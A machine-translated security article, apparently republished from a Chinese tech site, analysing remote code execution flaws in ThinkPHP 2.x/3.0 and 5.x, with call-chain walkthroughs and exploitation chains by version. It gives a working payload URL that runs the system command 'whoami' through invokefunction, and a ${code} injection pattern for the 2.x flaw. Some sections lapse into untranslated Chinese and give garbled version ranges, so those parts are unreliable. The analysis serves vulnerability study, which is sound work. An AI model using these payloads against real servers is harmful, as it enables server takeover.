Shulou(Shulou.com)06/01 Report--

This article introduces ThinkPHP loophole analysis and usage, the content is very detailed, interested friends can refer to, hope to be helpful to you.

I. component introduction 1.1 basic information

ThinkPHP is a fast, compatible and simple lightweight domestic PHP development framework, which follows the Apache 2 open source protocol, uses object-oriented development structure and MVC pattern, and combines the idea of Struts with TagLib (tag library), RoR ORM mapping and ActiveRecord pattern.

ThinkPHP can support server environments such as windows/Unix/Linux. The official version requires PHP version 5.0 or above, and supports a variety of databases such as MySql, PgSQL, Sqlite and PDO extensions.

1.2 introduction to version

ThinkPHP has developed so far, the core version mainly has the following series, ThinkPHP 2 series, ThinkPHP 3 series, ThinkPHP 5 series, ThinkPHP 6 series, each series in the code implementation and function, there is a big difference. Among them, ThinkPHP 2 and ThinkPHP 3 series have stopped maintenance, ThinkPHP 5 series is now the most used, and ThinkPHP 3 series has also accumulated a large number of historical users. The breakdown of the version is shown in the following figure:

Introduction of high-risk loopholes

Through the collection and collation of ThinkPHP vulnerabilities and filtering out the high-risk vulnerabilities, the following list can be obtained:

Judging from the data in the above table, most of the loopholes in ThinkPHP 3 series were exposed in 2016 / 2017, while those in ThinkPHP 5 series were basically exposed in 2017 / 2018. From 2020, ThinkPHP 6 series loopholes have also been excavated.

It can be seen that the high-risk vulnerabilities in ThinkPHP in recent years mainly exist in the functions in the framework, and these vulnerabilities need to be used in the process of secondary development before they can be exploited, so these vulnerabilities should be called risk functions in the framework, and most of these risk points can lead to SQL injection vulnerabilities, so developers use ThinkPHP in the process of Web development. We must pay attention to the historical risk points of these frameworks and avoid these functions or versions as far as possible to ensure the security of web applications.

Third, vulnerability exploitation chain 3.1, exposure carding

According to the historical high-risk vulnerabilities of ThinkPHP, developers can sort out the attack risk points of different versions. Developers can use the following icon to avoid the risk version of ThinkPHP, as shown in the ThinkPHP exposure brain map.

3.2. Summary of utilization chain

Based on the exposure brain map, we can draw several ThinkPHP framework vulnerability exploitation chains that can be directly exploited without the need for secondary development.

3.2.1 、 ThinkPHP 2.x/3.0 GetShell

ThinkPHP less than 3.0-GetShell

A lower version of ThinkPHP can use the above vulnerability to execute arbitrary system commands to gain server privileges.

3.2.2 、 ThinkPHP 5.0 GetShell

ThinkPHP 5.0.x-GetShell

First of all, identify the ThinkPHP framework series version.

According to the ThinkPHP version, if it is the 0.x version, the ThinkPHP 5.x remote code execution vulnerability can be used to execute arbitrary commands without logging in to obtain the highest privileges on the server.

3.2.3 、 ThinkPHP 5.1 GetShell

ThinkPHP 5.1.x-GetShell

First of all, identify the ThinkPHP framework series version.

According to the ThinkPHP version, if it is version 1.x, you can use ThinkPHP 5.x remote code execution vulnerability 1 to execute arbitrary commands without logging in to obtain the highest privileges on the server.

If you need to use ThinkPHP 5.x remote code execution vulnerability 2, you need to skip the error prompt in the php file, that is, there is a statement in the file: "error_reporting (0);", so the vulnerability in the 5.1.x series version needs to meet the above premise and is difficult to exploit.

IV. Analysis of highly available vulnerabilities

From the list of high-risk vulnerabilities, this paper makes an in-depth analysis of the high-risk vulnerabilities that ThinkPHP can exploit without secondary development.

4.1. ThinkPHP 2.x/3.0 remote code execution vulnerability

4.1.1, vulnerability summary

Vulnerability name: ThinkPHP 2.x/3.0 remote code execution

Reference number: none

Threat level: high risk

Scope of influence: ThinkPHP 2.x/3.0

Type of vulnerability: remote code execution

Difficulty in using: simple

4.1.2, vulnerability description

ThinkPHP is an open source MVC framework born to simplify enterprise application development and agile WEB application development. The / e dangerous parameter of preg_replace is used in the res parameter in Dispatcher.class.php, so that the second parameter of preg_replace will be executed as php code, resulting in a code execution vulnerability in which an attacker can use the constructed malicious URL to execute arbitrary PHP code.

4.1.3, vulnerability analysis

The vulnerability lies in the file / ThinkPHP/Lib/Think/Util/Dispatcher.class.php, which uses preg_replace 's / e pattern matching route in version 2.x of ThinkPHP. We all know that preg_replace 's / e pattern and php double quotes can cause code execution, that is, the trigger point of the vulnerability is in the 102line preg_replace function that parses the url path. The code is as follows:

The code block first detects the routing rules, and if there are no rules, the URL is scheduled according to the default rules. In the preg_replace () function, the / e pattern is used in the regular expression, the "replacement string" is evaluated as the PHP code, and the searched string is replaced with its result.

The regular expression can be simplified to "\ var / ([\ ^\ /])", that is, the two parameters before and after searching and getting "/", $regular expression ['\ 1'] = "\ 2" Is the operation on the array, using the first value searched before as the key of the new array, and the second value as the value of the new array, we find that we can construct the second value searched, that is, we can execute arbitrary PHP code. In PHP, we can execute the function using ${}, and then we use the php code of ${} format in the url of thinkphp to finally execute the thinkphp arbitrary code execution vulnerability. As follows:

Index.php?s=a/b/c/$ {code} index.php?s=a/b/c/$ {code} / d _ code _ _ find _ dex.php _ debase _

Because there are two routing rules for ThinkPHP, they are as follows:

Http://serverName/index.php/ module / controller / operation / [parameter name / parameter value.]

Servers that do not support PATHINFO can be accessed in compatibility mode as follows:

Http://serverName/index.php?s=/ module / controller / operation / [parameter name / parameter value.]

It can also take the form of index.php/a/b/c/$ {code}.

ThinkPHP 5.x remote code execution vulnerability 1

4.2.1, vulnerability summary

Vulnerability name: ThinkPHP 5.0.x-5.1.x remote code execution vulnerability

Reference number: none

Threat level: severe

Scope of influence: ThinkPHP v5.0.x

< 5.0.23,ThinkPHP v5.1.x < 5.0.31 漏洞类型：远程代码执行 利用难度：容易 4.2.2、漏洞描述 2018年12月10日，ThinkPHPv5系列发布安全更新，修复了一处可导致远程代码执行的严重漏洞。此次漏洞由ThinkPHP v5框架代码问题引起，其覆盖面广，且可直接远程执行任何代码和命令。电子商务行业、金融服务行业、互联网游戏行业等网站使用该ThinkPHP框架比较多，需要格外关注。由于ThinkPHP v5框架对控制器名没有进行足够的安全检测，导致在没有开启强制路由的情况下，黑客构造特定的请求，可直接进行远程的代码执行，进而获得服务器权限。 4.2.3、漏洞分析 本次ThinkPHP 5.0的安全更新主要是在library/think/APP.php文件中增加了对控制器名的限制，而ThinkPHP 5.1的安全更新主要是在library/think/route/dispatch/Module.php文件中增加了对控制器名的限制。 从以上补丁更新可知，该漏洞的根源在于框架对控制器名没有进行足够的检测，从而会在未开启强制路由的情况下被引入恶意外部参数，造成远程代码执行漏洞。 由ThinkPHP的架构可知，控制器（controller）是通过url中的路由进行外部传入的，即/index.php?s=/模块/控制器/操作/[参数名/参数值…]，控制器作为可控参数，经过library/think/APP.php文件进行处理，我们跟踪路由处理的逻辑，来完整看一下该漏洞的整体调用链： 首先在run()主函数中，url传入后需要经过路由检查，如下代码所示： 跟进 self::routeCheck 函数 在 620行中调用 $request->

The path () function, which is located in the thinkphp/library/think/Request.php file, follows up to the $this- > pathinfo () function of this file, in which the url is parsed to get each part of the route.

The var_pathinfo parameter is the default parameter of the system, and the default value is s. The value of the var_pathinfo obtained by the GET method, that is, the parameter / module / controller / operation / [parameter name / parameter value …] Is sent to the $path parameter in the routeCheck () function for route checking processing.

Go back to the routeCheck () function:

After initializing the route check configuration, Route::check is performed. As can be seen from the above code, if the route cannot find the corresponding operation, $result=false is returned, and if the mandatory route $must is enabled, an exception will be thrown, and finally enter the Route::parseUrl function for $path resolution. The above enters our vulnerability trigger point:

First, do url parsing in this function, then go to the parseUrlPath function, cut the routing address according to /, and return through the array:

Finally, in the parseUrl function, the returned $path is extracted from the route, that is, module, controller, action, and then encapsulated into $route and returned:

Go back to the run () function of the thinkphp/library/think/App.php file:

After completing the RouteCheck, go to the exec () function:

In this function, the routing information is first verified by entering the module () function, which first checks whether the module information in the route exists and exists in the prohibited module class table:

If the module exists, continue to trace down, and assign the controller and actionName in the module to $instance and $action respectively, and finally $instance and $action are assigned to the $call parameter.

Finally, the $call parameter goes into self::invokeMethod () for processing:

In the function, get the methods under the controller (method [0]) and action (method [1]) objects by reflecting ReflectionMethod, and then get the incoming parameters through $args = self::bindParams ($reflect, $vars);. The above is the vulnerability call chain.

Let's summarize the final attack chain according to Payload:

Siteserver/public/index.php?s=index/think\ app/invokefunction&function=call_user_func_array&vars [0] = system&vars [1] [] = whoami

Based on the above analysis, we resolve the route to:

Module:index

Controller:think\ app

Action:invokefunction

Through the above utilization chain, we finally enter the invokefunction method in the Think/app file by reflecting ReflectionMethod:

By constructing parameters, arbitrary code can eventually be executed.

4.3.The ThinkPHP 5.x remote code execution vulnerability 2

4.3.1, vulnerability summary

Vulnerability name: ThinkPHP 5.0.x-5.1.x remote code execution vulnerability

Reference number: none

Threat level: severe

Scope of influence: ThinkPHP v5.0.x

< 5.0.23,ThinkPHP v5.1.x < 5.0.31 漏洞类型：远程代码执行漏洞 利用难度：容易 4.3.2、漏洞描述 2019年1月11日，某安全团队公布了一篇ThinkPHP 5.0.远程代码执行漏洞文档，公布了一个ThinkPHP 5.0.远程代码执行漏洞。文章中的该漏洞与2018年12月的ThinkPHP 5.0.*远程代码执行漏洞原理相似，攻击者可利用该漏洞在一定条件下获取目标服务器的最高权限。后经研究，在一定条件下，ThinkPHP 5.1.x版本也存在该漏洞，在满足条件的情况下，攻击者可利用该漏洞执行任意代码。 4.3.3、漏洞分析 该漏洞的漏洞关键点存在于thinkphp/library/think/Request.php文件中： 从代码中可知： method()函数主要用于请求方法的判断，var_method没有通过，为可控参数，通过外部传入，thinkphp支持配置"表单伪装变量"，var_method在在外部的可控参数表现为_method: 由于var_method没有做任何过滤，我们可以通过控制_method参数的值来动态调用Request类中的任意方法，通过控制$_POST的值来向调用的方法传递参数。由上可知，漏洞存在于method()函数中，我们就需要寻找该函数的调用链，来构造POC。 第一个构造链在__construct()构造方法中，该方法如下： 函数中对$option数组进行遍历，当$option的键名为该类属性时，则将该类同名的属性赋值为$options中该键的对应值。因此可以构造请求如下，来实现对Request类属性值的覆盖，例如覆盖filter属性。filter属性保存了用于全局过滤的函数。 再上一个漏洞分析过程中，我们跟踪到了路由检查self::routeCheck 函数，在过程中，会进入到thinkphp/library/think/Route.php文件中的check()函数，函数中调用了method()方法，并将函数执行结果转换为小写后保存在$method变量。在调用构造函数覆盖变量时，可以直接覆盖method，这样上面的$method = strtolower($request->

The final value of $method of method (); can be controlled.

In this function, the method () function is called, in which the variable is overridden:

The request parameter is finally saved to the input parameter by calling the constructor _ _ construct ().

After routecheck, the first part of the call chain has been completed and the variable coverage has been realized. The next step is to implement the code execution after the variable coverage. The specific call chain is as follows:

Return to the run () function in the App.php file, then go to the exec () function, then to the module () function, and finally to the invokeMethod () function

Go from the invokeMethod () function to the bindParams () function, and then to the param () function:

And then finally call the input () function:

Finally, according to the array_walk_recursive () function, we go to the filterValue () function:

Finally, the code is executed through the callback function call_user_func, and the entire call chain is shown above.

This is the end of the analysis and usage of ThinkPHP vulnerabilities. I hope the above content can be helpful to you and you can learn more. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.